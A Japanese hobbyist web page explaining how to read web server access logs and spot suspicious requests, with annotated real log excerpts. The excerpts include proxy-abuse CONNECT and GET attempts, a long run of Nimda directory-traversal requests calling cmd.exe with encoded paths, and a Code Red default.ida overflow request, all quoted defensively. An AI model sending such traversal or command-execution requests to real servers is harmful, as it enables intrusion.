ホームHTMLに役立つヒントADSLでMACサーバ・実験室 > webサーバログの見方メモ

webサーバログの見方メモ

 webサーバのログの見方。ハックされたりウイルス・アタックがあったり、サーバはいろいろと大変です。webサーバを運営されている方はきっとログを取っていると思いますが、怪しいやつの見つけ方です。

■ 目次 ■

web共有のログ ▲ページトップ

 ここではweb共有のログを材料にします。

192.168.x.x - - [07/OCT/2005:19:47:54 +0900] "GET /blogcgi/index.html HTTP/1.1" 200 2081

 「192.168.x.x」はアクセス元のIPアドレスです。これはLAN内からですね。

 続く「- -」のうち、最初のものはブラウザがサポートしていればアクセス元の名前がわかります。次は認証時の名前です。認証がなければ当然記録されません(と、思うんだが、違っているかも)。

 「[07/OCT/2005:19:47:54 +0900] 」アクセスのあった時間です。

 「GET」や「POST」などは命令です。

 「/blogcgi/index.html HTTP/1.1」は「/blogcgi/index.html」がHTTPプロトコル1.1で送り出されたことを示しています。

 「200」エラー番号です。200はエラーではなく正常に送り出されたという意味。エラー番号の解説は、例えばこんなところが参考になります。http://www.studyinghttp.net/status_code 

 「2081」送り出されたバイト数です。

気をつけたいエラー番号 ▲ページトップ

 400番はwebサーバが構文を理解できないときに返るエラーです。怪しいことをやっている可能性がありますが、後述のようにブラウザによってはフツーにこのエラーが返ることがあります。散発的にでてくるだけなら気にする必要はありません。

 404番はファイルが見つからないというNot Foundエラー。例えば「/cgi-bin/form.cgi」なんてリクエストでこのエラーが返っている場合、かなり怪しいと言えるでしょう。

気をつけた方がいい命令 ▲ページトップ

 「GET」や「POST」は命令だといいましたが、ここでは気をつけたい命令を簡単に。

 GETは通常怪しくないアクセスですが、「GET http://aaa.com/」のようなログは注意。これはサーバをプロクシサーバに設定してhttp://aaa.com/にアクセスしようとしています。踏み台探しをしている可能性大です。

 CONNECTは踏み台命令なので、気をつけましょう。かなり怪しいです。

 OPTIONSは使える命令の一覧をリクエストしていますので、これもかなり怪しいです。web共有のログではお目にかかったことのない命令です。

 TRACEはサーバやプロキシの動作を追跡して診断するための物らしいですが、やっぱり怪しいです。web共有のログではお目にかかったことのない命令です。

 DELETE情報を削除しようとしています。web共有のログではお目にかかったことのない命令です。

ログの実例 ▲ページトップ

0.0.0.0 - - [07/OCT/2005:19:46:00 +0900] "GET /blogcgi/blog.rdf HTTP/1.1" 200 9403

 アクセス元が0.0.0.0というのが怪しさ満点ですが、振る舞いは全然怪しくない。ブログのRSSファイル、blog.rdfを持っていっただけ。お行儀の悪いRSSフィーダーの仕業でしょう。

 HTMLファイルのダウンローダーらしいものも0.0.0.0でアクセスしてくるものがあります。

xxx.xxx.xxx.xxx - -[13/OCT/2005:10:00:25 +0900] - 400 0

 こちらは400番エラーでも怪しくない例。

 どういう時に発生するリクエストなのかわかりませんが、たまにブラウザが訳の判らんリクエストをすることがあるようです。IEで自分のサーバを見た後、ログをチェックしてみるとこれがあることがあります。マイクロソフト、何をやっているんだ! 散発的にこういうのがありますが、無視して良さそうです。

61.231.49.1 [08/OCT/2005:19:25:35 +0900] - 400 0
61.231.49.1 [08/OCT/2005:19:25:35 +0900] CONNECT xxx.xxx.xxx.xxx:25 HTTP/1.1 400 375

 xxx.xxx.xxx.xxxはIPアドレス。このIPアドレスのサーバの25番ポートに接続しようとしています。25番ポートはSMTPポートですから、うちを踏み台にしてメールを送ろうとしたようです。

 それに先だって何か攻撃を加えているようで、それが功を奏さず400エラーで戻っています。1秒と間をおかない連続攻撃ですね。

 完全に怪しいのでアクセス元もさらしておきます。ちなみに61.231.49.1は台湾のサーバです。攻撃相手のxxx.xxx.xxx.xxxは中国のサーバでした。独立をめぐってもめてますからねぇ。

61.142.131.33 - - [13/OCT/2005:17:04:49 +0900] "CONNECT 65.54.253.230:25 HTTP/1.1" 400 375
61.142.131.33 - - [13/OCT/2005:17:04:51 +0900] "GET http://www.ebay.com/ HTTP/1.1" 302 75

 こちらは中国のサーバからハックしようとした例。最初に25番ポートを叩こうとしてます。狙われたのは(65.54.253.230)マイクロソフトのサーバです。

 次はうちのサーバをプロクシに設定してebayにアクセスしようとしてますね。302が返ってますが、通常のブラウザからこのアクセス方法を使うと、「指定されたファイルは存在しません」と表示されるだけ。

220.108.70.68 - - [14/OCT/2005:16:07:50 +0900] "GET http://www.google.co.jp/ HTTP/1.1" 302 75

 これは日本国内からgoogleにアクセスしようとした例。Kokusai-Kougyou-Kandaというスパム業者からです。プロクシサーバを探しているようです。8080ポートはプロキシでよく使われますから。

xxx.xxx.xxx.xxx - - [09/MAY/2005:13:12:03 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 230
xxx.xxx.xxx.xxx - - [09/MAY/2005:13:12:03 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 230
xxx.xxx.xxx.xxx - - [09/MAY/2005:13:12:23 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 230
xxx.xxx.xxx.xxx - - [09/MAY/2005:13:13:10 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 230
xxx.xxx.xxx.xxx - - [09/MAY/2005:13:13:23 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 230
xxx.xxx.xxx.xxx - - [09/MAY/2005:13:13:42 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 230
xxx.xxx.xxx.xxx - - [09/MAY/2005:13:13:49 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 230
xxx.xxx.xxx.xxx - - [09/MAY/2005:13:13:54 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 230
xxx.xxx.xxx.xxx - - [09/MAY/2005:13:14:00 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 230
xxx.xxx.xxx.xxx - - [09/MAY/2005:13:14:11 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 230
xxx.xxx.xxx.xxx - - [09/MAY/2005:13:14:17 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 230
xxx.xxx.xxx.xxx - - [09/MAY/2005:13:14:22 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 230
xxx.xxx.xxx.xxx - - [09/MAY/2005:13:14:34 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 230

 ああ、長い。これはNimdaというウイルスによるアタック。このウイルスは、未だに生き残っているものがあり、先日も変型らしいものが同様のアタックを仕掛けてきてました。ご覧のようにログに長々と記録を残すので目障りでしょうがない。

xxx.xxx.xxx.xxx - - [09/MAY/2005:17:51:28 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX216.230.138.252 - - [09/MAY/2005:23:49:54 +0900] - 400 375

 こちらはCodeRedというウイルスによるアタック。QPQ 1.02はこのアタックで落ちます。一時このウイルスは猛威を振るい、うちにもけっこうアタックが来てました。

 うちのサーバはポートが8080なせいか、あんまりウイルスらしいアタックはないですね。ただ、8080ポートはプロクシでよく使われるポート番号なので、プロクシ探しがたまにくるみたいです。

ホームHTMLに役立つヒントADSLでMACサーバ・実験室 > webサーバログの見方メモ